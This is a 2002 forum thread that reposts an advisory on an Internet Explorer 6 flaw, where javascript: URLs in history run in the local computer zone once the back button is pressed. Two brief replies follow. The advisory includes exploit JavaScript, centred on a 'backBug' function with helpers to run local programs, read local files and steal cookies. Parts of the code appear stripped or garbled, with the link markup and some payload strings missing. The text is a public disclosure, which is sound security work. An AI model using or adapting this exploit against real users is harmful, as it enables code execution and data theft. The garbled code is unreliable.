Results 1 to 3 of 3

Thread: Using the "Back" button on IE is dangerous

  1. April 16th, 2002, 01:32 PM #1
    s0nIc
    s0nIc is offline
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Exclamation Using the "Back" button on IE is dangerous

    IE allows urls containing the javascript protocoll in the history list.
    Code injected in the url will operate in the same zone/domain as the last
    url viewed. The javascript url can be set to trigger when a user presses
    the backbutton.


    The normal behaviour when a page fails to load is to press the backbutton.
    The error page shown by IE is operating in the local computer zone
    (res://C:WINNTSystem32shdoclc.dll/dnserror.htm# on Win2000). Thus, we
    can execute code and read local files.


    EXPLOIT:
    ========
    The exploit works as follow: Press one of the links and then the back
    button.

    Note: Exploit has only been tested on fully patched IE 6.0, with Win XP
    and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and
    test.txt must exist.
    Code:
    --------------------------CUT HERE-------------------------------

Press link and then the backbutton to trigger script.

Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)

Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)

Read c:test.txt (needs to be created)

Read Google cookie


// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
s = '';
backBug(badUrl,s);
}
function readFile(file){
s = '';
backBug(badUrl,s);
}
function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(""+payload+"")')";
s+= ";history.back();} else 'location=""+url
s+= "";document.title=""+page+"";';";
location = s;
}


--------------------------CUT HERE-------------------------------
    Disclaimer:
    ===========
    Andreas Sandblad is not responsible for the misuse of the
    information provided in this advisory. The opinions expressed
    are my own and not of any company. In no event shall the author
    be liable for any damages whatsoever arising out of or in
    connection with the use or spread of this advisory. Any use of
    the information is at the user's own risk.


    Source: http://www.xatrix.org/article1384.html
    Reply With Quote Reply With Quote
  2. April 16th, 2002, 02:15 PM #2
    Guus
    Guus is offline
    Hi mom!
    Join Date
    Aug 2001
    Posts
    1,103
    Ermh, AUCH!... Auch...
    I wish to express my gratitude to the people of Italy. Thank you for inventing pizza.
    Reply With Quote Reply With Quote
  3. April 16th, 2002, 02:30 PM #3
    RiOtEr
    RiOtEr is offline
    Banned
    Join Date
    Sep 2001
    Posts
    852
    some versions get a javascript error what ones i dont know but the one at a friends house get them
    RiOtEr
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules